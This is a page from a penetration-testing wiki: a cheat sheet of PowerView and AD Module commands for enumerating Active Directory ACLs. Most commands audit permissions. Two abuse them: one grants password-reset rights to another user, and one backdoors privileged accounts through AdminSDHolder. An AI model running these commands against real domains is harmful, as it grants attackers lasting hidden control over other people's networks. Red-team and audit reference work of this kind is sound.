📄
Bufu-Sec Wiki
GithubTwitter
  • Bufu-Sec Wiki
  • Active Directory
    • General
      • General
      • Installation
      • DNS
      • Kerberos
      • Kerberos Delegation
    • Enumeration
      • AD Module
      • Bloodhound
      • PowerShell Cheatsheet
      • PowerView Cheatsheet
      • Users
      • Groups
      • Computers
      • OUs
      • GPOs
      • ACLs
      • Domains
      • Trusts
      • Forest Mappings
      • Files and Shares
      • Kerbrute
    • Privilege Escalation
      • Kerberoasting
      • AS-REP Roasting
      • Constrained Delegation
      • Unconstrained Delegation
      • DNS Admins
    • Lateral Movement
      • PS Remoting
      • Credential Dumping
      • DC Sync
      • Overpass the Hash
      • Ticket Harvesting
      • Pass the Ticket
    • Persistence
      • Golden Tickets
      • Silver Tickets
      • ACL Attacks
      • Custom SSPs
      • DC Shadow
      • Skeleton Key
      • DSRM
    • Trust Attacks
      • Cross Domain Attacks
      • Cross Forest Attacks
      • MSSQL Servers
    • MITM & Relay Attacks
      • LLMNR Poisoning
      • SMB Relay
      • IPv6 Attacks
    • Detection & Defense
      • Domain Admins
      • Architectural Changes
      • Microsoft ATA
Powered by GitBook
On this page
  • General
  • Enumerate ACLs without Resolving GUIDs
  • Get the ACLs Associated with the Specified Object
  • Get the ACLs Associated with the Specified Prefix to Be Used for Search
  • Get the ACLs Associated with the Specified LDAP Path to Be Used for Search
  • Search for Interesting ACEs
  • Get the ACLs Associated with the Specified Path
  • Enumerate Who Has Rights to the 'matt' User in 'testlab.local', Resolving Rights GUIDs to Names
  • Grant User 'will' the Rights to Change 'matt's Password
  • Audit the Permissions of AdminSDHolder, Resolving GUIDs
  • Backdoor the ACLs of All Privileged Accounts with the 'matt' Account through AdminSDHolder Abuse
  • Retrieve most Users Who Can Perform DC Replication for dev.testlab.local (i.e. DCsync)
  • Enumerate Permissions for GPOs where Users with RIDs of > -1000 Have Some Kind of Modification/Control Rights
  1. Active Directory
  2. Enumeration

ACLs

General

  • Access Control Entries (ACE) correspond to individual permission or audits access

  • Who has permission and what can be done on an object?

  • Two types:

    • DACL -> Defines the permissions trustees (a user or group) have on an object

    • SACL - Logs success and failure audit messages when an object is accessed

Enumerate ACLs without Resolving GUIDs

# AD Module
(Get-ACL 'CN=Domain Admins,CN=Users,DC=dc01,DC=dc02,DC=local').Access

Get the ACLs Associated with the Specified Object

# PowerView
Get-ObjectACL -SamAccountName "Users" -ResolveGUIDs

Get the ACLs Associated with the Specified Prefix to Be Used for Search

# PowerView
Get-ObjectACL -ADSPrefix 'CN=Administrator,CN=Users' -Verbose

Get the ACLs Associated with the Specified LDAP Path to Be Used for Search

# PowerView
Get-ObjectACL -ADSPath "LDAP://CN=Domain Admins,CN=Users,DC=dc01,DC=dc02,DC=local" -ResolveGUIDs -Verbose

Search for Interesting ACEs

# PowerView
Invoke-ACLScanner -ResolveGUIDs

Get the ACLs Associated with the Specified Path

# PowerView
Get-PathACL -Path "\\dc01.lab.local\sysvol"

Enumerate Who Has Rights to the 'matt' User in 'testlab.local', Resolving Rights GUIDs to Names

# PowerView
Get-DomainObjectAcl -Identity matt -ResolveGUIDs -Domain testlab.local

Grant User 'will' the Rights to Change 'matt's Password

# PowerView
Add-DomainObjectAcl -TargetIdentity matt -PrincipalIdentity will -Rights ResetPassword -Verbose

Audit the Permissions of AdminSDHolder, Resolving GUIDs

# PowerView
Get-DomainObjectAcl -SearchBase 'CN=AdminSDHolder,CN=System,DC=testlab,DC=local' -ResolveGUIDs

Backdoor the ACLs of All Privileged Accounts with the 'matt' Account through AdminSDHolder Abuse

# PowerView
Add-DomainObjectAcl -TargetIdentity 'CN=AdminSDHolder,CN=System,DC=testlab,DC=local' -PrincipalIdentity matt -Rights All

Retrieve most Users Who Can Perform DC Replication for dev.testlab.local (i.e. DCsync)

# PowerView
Get-DomainObjectAcl "dc=dev,dc=testlab,dc=local" -ResolveGUIDs | ? {
    ($_.ObjectType -match 'replication-get') -or ($_.ActiveDirectoryRights -match 'GenericAll')
}

Enumerate Permissions for GPOs where Users with RIDs of > -1000 Have Some Kind of Modification/Control Rights

# PowerView
Get-DomainObjectAcl -LDAPFilter '(objectCategory=groupPolicyContainer)' | ? { ($_.SecurityIdentifier -match '^S-1-5-.*-[1-9]\d{3,}$') -and ($_.ActiveDirectoryRights -match 'WriteProperty|GenericAll|GenericWrite|WriteDacl|WriteOwner')}
PreviousGPOsNextDomains

Last updated 2 years ago